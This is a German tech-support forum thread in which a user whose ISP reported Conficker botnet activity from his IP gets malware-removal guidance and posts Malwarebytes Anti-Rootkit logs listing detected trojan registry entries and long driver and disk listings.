UPC meldet: Virus, würmer werden über meine IP versendet

Lost_Viking · 31.07.2017, 19:47

Hallo an alle hier im Trojaner Board. komme direkt vom hijack-Board, nachdem ich gemerkt habe dass das nicht mehr unterhalten wird.
Habe dort auch ein Thread eröffnet mit dem Namen Lost_Viking
mit dem Titel UPC meldet: Virus, würmer werden über meine IP versendet
Habe aber seither einige Programme bzw Games deinstalliert die ich nicht mehr verwendet, bevor ich in dieses Board gestossen bin. Die logs dort sind also nicht mehr aktuell.

Wollte eigentlich hier den ersten Schritt für die Hilfesuchenden abarbeiten....

Leider das erste Problem:
Sobald ich "Farbar's Recovery Scan Tool" runterladen will schliesst das Fenster....egal von welchem Browser. Sehr interessant. Will mich da einer von dem runterladen abhalten?

Wäre froh um Hilfe, wenn ich schon beim ersten Schritt feststecke

Habe inzwischen auch Antwort vom UPC Desk bekommen:

Zitat:

Guten Tag Herr Walser
Vielen Dank für Ihr Feedback. Der Fall wurde aufgrund von Hinweisen auf den Conficker Wurm ausgelöst.
https://de.wikipedia.org/wiki/Conficker
Bisher letzte Log entrys (Da wir lokal UTC+2 haben bitte 2 Stunde dazurechnen)
ip,source time UTC+0,malware family,type
80.218.222.56,2017-07-28 10:46:05Z,conficker,botnet drone
80.218.222.56,2017-07-28 10:46:05Z,conficker,botnet drone
Bei uns sind nach dem 28.07.2017 keine neuen Hinweise auf eine Sicherheitslücke mehr eingegangen.
Ihre Massnahme war demnach erfolgreich. Den Fall haben wir abgeschlossen.
Falls wir neue Hinweise auf eine Sicherheitslücke erhalten, werden wir Sie wieder benachrichtigen.
Besten Dank für Ihre wertvolle Zusammenarbeit.
Freundliche Grüsse
M.... G.....
Abuse Desk

cosinus · 31.07.2017, 20:56

hi,

Zitat:

Bei uns sind nach dem 28.07.2017 keine neuen Hinweise auf eine Sicherheitslücke mehr eingegangen.
Ihre Massnahme war demnach erfolgreich. Den Fall haben wir abgeschlossen.

Ich versteh dein Anliegen nicht, warum sollen wir noch was tun wenn der Fall abgeschlossen ist?

Wenn das Problem noch da ist: wo sind die Logs mit den Funden?

Lost_Viking · 01.08.2017, 02:04

Zitat:

Zitat von Lost_Viking

:
Sobald ich "Farbar's Recovery Scan Tool" runterladen will schliesst das Fenster....egal von welchem Browser. Sehr interessant. Will mich da einer von dem runterladen abhalten?

Eigentlich das verdächtige Verhalten meines Browsers, wenn ich das Tool runterladen will. Ich kann also auch keine Logs erstellen....

Habe auch verschiedene Quellen benutzt
-NETZWELT
-Bleeping Computer
-TechSpot
usw. klicke auf den Link...sehe kurz die Seite mit dem Downloadlink. Der Browser wird aber sofort abgewürgt. Bei anderen Programm-Downloads nie der Fall. Schon seltsam

Habe Mir das Programm im abgesicherten Modus geholt.
Da auf dem Desktop gestartet, ploppt kurz ein Fenster auf (fast nicht zu lesen): Das Programm ist nicht funktionsfähig

habe beide getestet 32+64 bit. Auch mit Kompatibilität Windows 7+8

cosinus · 01.08.2017, 07:57

Malwarebytes Anti-Rootkit (MBAR)

Downloade dir bitte

Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.

Starte bitte die mbar.exe.
Folge den Anweisungen auf deinem Bildschirm gemäß Anleitung zu Malwarebytes Anti-Rootkit
Aktualisiere unbedingt die Datenbank und erlaube dem Tool, dein System zu scannen.
Klicke auf den CleanUp Button und erlaube den Neustart.
Während dem Neustart wird MBAR die gefundenen Objekte entfernen, also bleib geduldig.
Nach dem Neustart starte die mbar.exe erneut.
Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.

Das Tool wird im erstellten Ordner eine Logfile ( mbar-log-<Jahr-Monat-Tag>.txt ) erzeugen. Bitte poste diese hier.

Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers

Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

Lost_Viking · 01.08.2017, 12:06

Danke für die schnelle Hilfe. War gestern bisschen unruhig weil sich mein Verdacht auf einen Trojaner verstärkt hatte.

Vor allem weil ich das FRST65 exe kurz nach aufstart ausführen konnte. Etwa nach 7 Sekunden wird das Programm von irgendwas anderem geschlossen und verhindert das starten.

Hab mir anschliessend den Trojan Remover geholt.
Der hat dann auch 2 verdächtige Prozesse bemerkt:
Edit: es sind die gleichen Prozesse die auch mbar.exe bemerkt hat

Hoffe habe mit diesem Eingriff keine nützlichen Spuren vernichtet.

------------------

Mbar nach Anleitung ausgeführt. Antivir hat während des Vorgangs noch eine verdächtige Registrierung gesperrt.

Code:

ATTFilter

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.08.01.04
  rootkit: v2017.05.27.01

Windows 10 x64 NTFS
Internet Explorer 11.483.15063.0
M***** W***** :: SILENTDRAGON [administrator]

01.08.2017 12:18:05
mbar-log-2017-08-01 (12-18-05).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 309854
Time elapsed: 8 minute(s), 43 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 2
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^Yfbopxo (Trojan.Fileless.MTGen) -> Data:  -> Delete on reboot. [2107daae04a5d5618807cdf128daee12]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^Ogfitotar (Trojan.Fileless.MTGen) -> Data:  -> Delete on reboot. [13152464c2e75ed8dbb4ba04d032ea16]

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\Users\Martin Walser\AppData\Local\b95cd\92de9.bat (Trojan.Fileless.MTGen) -> Delete on reboot. [76b2e5a37138b77f16c5ca7cfc045ba5]

Physical Sectors Detected: 0
(No malicious items detected)

(end)

Der zweite Durchgang hat nicht Verdächtiges mehr gemeldet

Edit: Jetzt würde FRST64.exe gehen. Warte diesmal aber auf Eure Anweisung

cosinus · 01.08.2017, 12:31

Auf den Briefmarken soll man bitte wer etwas erkennen?

Was sollst du bei MBAR tun, wenn es fündig wurde?

Lost_Viking · 01.08.2017, 12:59

Entschuldigung. Bei Fund Logfile anhängen. Besser alles lesen.

Code:

ATTFilter

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.09.3.1001

(c) Malwarebytes Corporation 2011-2012

OS version: 10.0.9200 Windows 10 x64

Account is Administrative

Internet Explorer version: 11.483.15063.0

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED, F:\ DRIVE_FIXED, G:\ DRIVE_FIXED
CPU speed: 3.300000 GHz
Memory total: 17069985792, free: 11603292160

Downloaded database version: v2017.08.01.04
Downloaded database version: v2017.05.27.01
Downloaded database version: v2017.07.17.01
=======================================
Initializing...
Driver version: 0.3.0.4
------------ Kernel report ------------
     08/01/2017 12:17:29
------------ Loaded modules -----------
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kd.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\System32\drivers\msrpc.sys
\SystemRoot\System32\drivers\ksecdd.sys
\SystemRoot\System32\drivers\werkernel.sys
\SystemRoot\System32\drivers\CLFS.SYS
\SystemRoot\System32\drivers\tm.sys
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\BOOTVID.dll
\SystemRoot\System32\drivers\FLTMGR.SYS
\SystemRoot\System32\drivers\clipsp.sys
\SystemRoot\System32\drivers\cmimcext.sys
\SystemRoot\System32\drivers\ntosext.sys
\SystemRoot\system32\CI.dll
\SystemRoot\System32\drivers\cng.sys
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\system32\drivers\SleepStudyHelper.sys
\SystemRoot\System32\Drivers\acpiex.sys
\SystemRoot\System32\Drivers\WppRecorder.sys
\SystemRoot\System32\drivers\ACPI.sys
\SystemRoot\System32\drivers\WMILIB.SYS
\SystemRoot\System32\drivers\intelpep.sys
\SystemRoot\system32\drivers\WindowsTrustedRT.sys
\SystemRoot\System32\drivers\WindowsTrustedRTProxy.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\drivers\msisadrv.sys
\SystemRoot\System32\drivers\pci.sys
\SystemRoot\System32\drivers\vdrvroot.sys
\SystemRoot\system32\drivers\pdc.sys
\SystemRoot\system32\drivers\CEA.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\System32\drivers\spaceport.sys
\SystemRoot\System32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\System32\drivers\iaStorA.sys
\SystemRoot\System32\drivers\storport.sys
\SystemRoot\System32\drivers\EhStorClass.sys
\SystemRoot\System32\drivers\fileinfo.sys
\SystemRoot\System32\Drivers\Wof.sys
\SystemRoot\System32\Drivers\NTFS.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\System32\drivers\wfplwfs.sys
\SystemRoot\system32\DRIVERS\avdevprot.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\System32\drivers\volume.sys
\SystemRoot\System32\drivers\volsnap.sys
\SystemRoot\System32\Drivers\SmartDefragDriver.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\system32\drivers\iorate.sys
\SystemRoot\System32\drivers\disk.sys
\SystemRoot\System32\drivers\CLASSPNP.SYS
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\drivers\cdrom.sys
\SystemRoot\system32\drivers\filecrypt.sys
\SystemRoot\system32\drivers\tbs.sys
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\BasicDisplay.sys
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\vmbkmclr.sys
\SystemRoot\System32\drivers\BasicRender.sys
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\drivers\vwififlt.sys
\SystemRoot\System32\drivers\pacer.sys
\SystemRoot\system32\drivers\netbios.sys
\SystemRoot\system32\DRIVERS\avkmgr.sys
\SystemRoot\system32\DRIVERS\avipbb.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\System32\drivers\npsvctrig.sys
\SystemRoot\System32\drivers\mssmbios.sys
\??\C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS
\SystemRoot\System32\drivers\gpuenergydrv.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\DRIVERS\ahcache.sys
\SystemRoot\system32\drivers\SaiBus.sys
\SystemRoot\System32\DriverStore\FileRepository\compositebus.inf_amd64_de4c68ea4fb1be53\CompositeBus.sys
\SystemRoot\System32\drivers\kdnic.sys
\SystemRoot\System32\drivers\umbus.sys
\SystemRoot\System32\drivers\intelppm.sys
\SystemRoot\System32\drivers\wmiacpi.sys
\SystemRoot\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys
\SystemRoot\System32\drivers\HDAudBus.sys
\SystemRoot\System32\drivers\portcls.sys
\SystemRoot\System32\drivers\drmk.sys
\SystemRoot\System32\drivers\ks.sys
\SystemRoot\System32\drivers\USBXHCI.SYS
\SystemRoot\system32\drivers\ucx01000.sys
\SystemRoot\System32\drivers\TeeDriverW8x64.sys
\SystemRoot\System32\drivers\usbehci.sys
\SystemRoot\System32\drivers\USBPORT.SYS
\SystemRoot\System32\drivers\e2xw10x64.sys
\SystemRoot\System32\drivers\asmtxhci.sys
\SystemRoot\system32\DRIVERS\AVerPL33_x64.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\System32\drivers\ETDSMBus.sys
\SystemRoot\system32\drivers\nvvad64v.sys
\SystemRoot\System32\drivers\nvvhci.sys
\SystemRoot\System32\drivers\NdisVirtualBus.sys
\SystemRoot\System32\drivers\swenum.sys
\SystemRoot\system32\drivers\LGBusEnum.sys
\SystemRoot\system32\drivers\LGJoyXlCore.sys
\SystemRoot\System32\drivers\rdpbus.sys
\SystemRoot\System32\drivers\SaiMini.sys
\SystemRoot\System32\drivers\HIDCLASS.SYS
\SystemRoot\System32\drivers\HIDPARSE.SYS
\SystemRoot\System32\drivers\usbhub.sys
\SystemRoot\system32\drivers\nvhda64v.sys
\SystemRoot\System32\drivers\UsbHub3.sys
\SystemRoot\system32\drivers\RTKVHD64.sys
\SystemRoot\system32\drivers\MBfilt64.sys
\SystemRoot\System32\drivers\asmthub3.sys
\SystemRoot\System32\drivers\kbdhid.sys
\SystemRoot\System32\drivers\kbdclass.sys
\SystemRoot\System32\drivers\mouhid.sys
\SystemRoot\System32\drivers\mouclass.sys
\SystemRoot\System32\drivers\usbccgp.sys
\SystemRoot\System32\drivers\hidusb.sys
\SystemRoot\system32\DRIVERS\lvuvc64.sys
\SystemRoot\system32\drivers\usbaudio.sys
\SystemRoot\system32\DRIVERS\lvrs64.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\win32kfull.sys
\SystemRoot\System32\win32kbase.sys
\SystemRoot\System32\Drivers\dump_diskdump.sys
\SystemRoot\System32\Drivers\dump_iaStorA.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\System32\drivers\dxgmms2.sys
\SystemRoot\System32\drivers\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\system32\drivers\mmcss.sys
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\system32\drivers\wcifs.sys
\SystemRoot\system32\drivers\storqosflt.sys
\SystemRoot\system32\DRIVERS\avgntflt.sys
\SystemRoot\System32\drivers\registry.sys
\SystemRoot\system32\drivers\lltdio.sys
\SystemRoot\system32\drivers\mslldp.sys
\SystemRoot\system32\drivers\rspndr.sys
\SystemRoot\System32\DRIVERS\wanarp.sys
\SystemRoot\system32\drivers\ndisuio.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\avnetflt.sys
\??\C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\SystemRoot\system32\drivers\Ndu.sys
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\SystemRoot\system32\drivers\WudfPf.sys
\SystemRoot\System32\drivers\condrv.sys
\SystemRoot\System32\drivers\tunnel.sys
\SystemRoot\system32\drivers\LGVirHid.sys
\SystemRoot\System32\drivers\rdpvideominiport.sys
\SystemRoot\System32\cdd.dll
\??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys
\??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
\??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
----------- End -----------
Scan Interrupted
Done!

Scan started
Database versions:
  main:    v2017.08.01.04
  rootkit: v2017.05.27.01

Scan was aborted.
=======================================

Scan started
Database versions:
  main:    v2017.08.01.04
  rootkit: v2017.05.27.01

<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffbe8989be9060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffbe8989b9f9f0, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffbe8989be9060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffbe898588ae40, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffbe89884981e0, DeviceName: \Device\00000036\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: BE291492

Partition information:

    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 2048  Numsec = 716800
    Partition is bootable
    Partition file system is NTFS

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 718848  Numsec = 498475696
    Partition is not bootable
    Partition file system is NTFS

    Partition 2 type is Other (0x27)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 499195904  Numsec = 919552
    Partition is not bootable
    Partition file system is NTFS

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

Disk Size: 256060514304 bytes
Sector size: 512 bytes

Done!
Physical Sector Size: 512
Drive: 1, DevicePointer: 0xffffbe8989be8060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffbe8989b9d9f0, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffbe8989be8060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
DevicePointer: 0xffffbe898588aa10, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffbe8988496060, DeviceName: \Device\00000037\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
Drive 1
Scanning MBR on drive 1...
Inspecting partition table:
This drive is a GPT Drive.
MBR Signature: 55AA
Disk Signature: 0

GPT Protective MBR Partition information:

    Partition 0 type is EFI-GPT (0xee)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 1  Numsec = 4294967295

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

GPT Partition information:

    GPT Header Signature 4546492050415254
    GPT Header Revision 65536 Size 92 CRC 2062005913
    GPT Header CurrentLba = 1 BackupLba 15628064767
    GPT Header FirstUsableLba 34  LastUsableLba 15628064734
    GPT Header Guid d80aac34-b589-4897-a2e0-164b73895348
    GPT Header Contains 128 partition entries starting at LBA 2
    GPT Header Partition entry size = 128

    Backup GPT header Signature 4546492050415254
    Backup GPT header Revision 65536 Size 92 CRC 2062005913
    Backup GPT header CurrentLba = 15628064767 BackupLba 1
    Backup GPT header FirstUsableLba 34  LastUsableLba 15628064734
    Backup GPT header Guid d80aac34-b589-4897-a2e0-164b73895348
    Backup GPT header Contains 128 partition entries starting at LBA 15628064735
    Backup GPT header Partition entry size = 128

    Partition 0 Type e3c9e316-b5c-4db8-817d-f92df0215ae
    Partition ID 73a4163a-cae1-48f4-bd5c-dcb8e3d7543
    FirstLBA 34  Last LBA 262177
    Attributes 0
    Partition Name         Microsoft reserved partition

    Partition 1 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID f19d7015-d86c-497e-989-1722d24df3b
    FirstLBA 264192  Last LBA 7814162431
    Attributes 0
    Partition Name                 Basic data partition

    Partition 2 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID a8af2a8a-ee54-438d-9d2a-9d9225f73da9
    FirstLBA 7814162432  Last LBA 15628060671
    Attributes 0
    Partition Name                 Basic data partition

Disk Size: 8001569161216 bytes
Sector size: 512 bytes

Done!
File "C:\Users\Martin Walser\AppData\Local\Comms\UnistoreDB\store.vol" is sparse (flags = 32768)
File "C:\Windows\System32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat" is sparse (flags = 32768)
Infected: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^Yfbopxo --> [Trojan.Fileless.MTGen]
Infected: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^Ogfitotar --> [Trojan.Fileless.MTGen]
Infected: C:\Users\Martin Walser\AppData\Local\b95cd\92de9.bat --> [Trojan.Fileless.MTGen]
Scan finished
Creating System Restore point...
Cleaning up...
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Executing an action cmd.exe...
Success!
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Queuing an action cmd.exe
Removal scheduling successful. System shutdown needed.
System shutdown occurred
=======================================


---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.09.3.1001

(c) Malwarebytes Corporation 2011-2012

OS version: 10.0.9200 Windows 10 x64

Account is Administrative

Internet Explorer version: 11.483.15063.0

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED, F:\ DRIVE_FIXED, G:\ DRIVE_FIXED
CPU speed: 3.300000 GHz
Memory total: 17069985792, free: 13223682048

=======================================
Initializing...
Driver version: 0.3.0.4
------------ Kernel report ------------
     08/01/2017 12:40:39
------------ Loaded modules -----------
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kd.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\System32\drivers\msrpc.sys
\SystemRoot\System32\drivers\ksecdd.sys
\SystemRoot\System32\drivers\werkernel.sys
\SystemRoot\System32\drivers\CLFS.SYS
\SystemRoot\System32\drivers\tm.sys
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\BOOTVID.dll
\SystemRoot\System32\drivers\FLTMGR.SYS
\SystemRoot\System32\drivers\clipsp.sys
\SystemRoot\System32\drivers\cmimcext.sys
\SystemRoot\System32\drivers\ntosext.sys
\SystemRoot\system32\CI.dll
\SystemRoot\System32\drivers\cng.sys
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\system32\drivers\SleepStudyHelper.sys
\SystemRoot\System32\Drivers\acpiex.sys
\SystemRoot\System32\Drivers\WppRecorder.sys
\SystemRoot\System32\drivers\ACPI.sys
\SystemRoot\System32\drivers\WMILIB.SYS
\SystemRoot\System32\drivers\intelpep.sys
\SystemRoot\system32\drivers\WindowsTrustedRT.sys
\SystemRoot\System32\drivers\WindowsTrustedRTProxy.sys
\SystemRoot\system32\drivers\CLASSPNP.SYS
\SystemRoot\System32\drivers\imofugc.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\drivers\msisadrv.sys
\SystemRoot\System32\drivers\pci.sys
\SystemRoot\System32\drivers\vdrvroot.sys
\SystemRoot\system32\drivers\pdc.sys
\SystemRoot\system32\drivers\CEA.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\System32\drivers\spaceport.sys
\SystemRoot\System32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\System32\drivers\iaStorA.sys
\SystemRoot\System32\drivers\storport.sys
\SystemRoot\System32\drivers\EhStorClass.sys
\SystemRoot\System32\drivers\fileinfo.sys
\SystemRoot\System32\Drivers\Wof.sys
\SystemRoot\System32\Drivers\NTFS.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\System32\drivers\wfplwfs.sys
\SystemRoot\system32\DRIVERS\avdevprot.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\System32\drivers\volume.sys
\SystemRoot\System32\drivers\volsnap.sys
\SystemRoot\System32\Drivers\SmartDefragDriver.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\system32\drivers\iorate.sys
\SystemRoot\System32\drivers\disk.sys
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\drivers\cdrom.sys
\SystemRoot\system32\drivers\filecrypt.sys
\SystemRoot\system32\drivers\tbs.sys
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\BasicDisplay.sys
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\vmbkmclr.sys
\SystemRoot\System32\drivers\BasicRender.sys
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\drivers\vwififlt.sys
\SystemRoot\System32\drivers\pacer.sys
\SystemRoot\system32\drivers\netbios.sys
\SystemRoot\system32\DRIVERS\avkmgr.sys
\SystemRoot\system32\DRIVERS\avipbb.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\System32\drivers\npsvctrig.sys
\SystemRoot\System32\drivers\mssmbios.sys
\??\C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS
\SystemRoot\System32\drivers\gpuenergydrv.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\DRIVERS\ahcache.sys
\SystemRoot\system32\drivers\SaiBus.sys
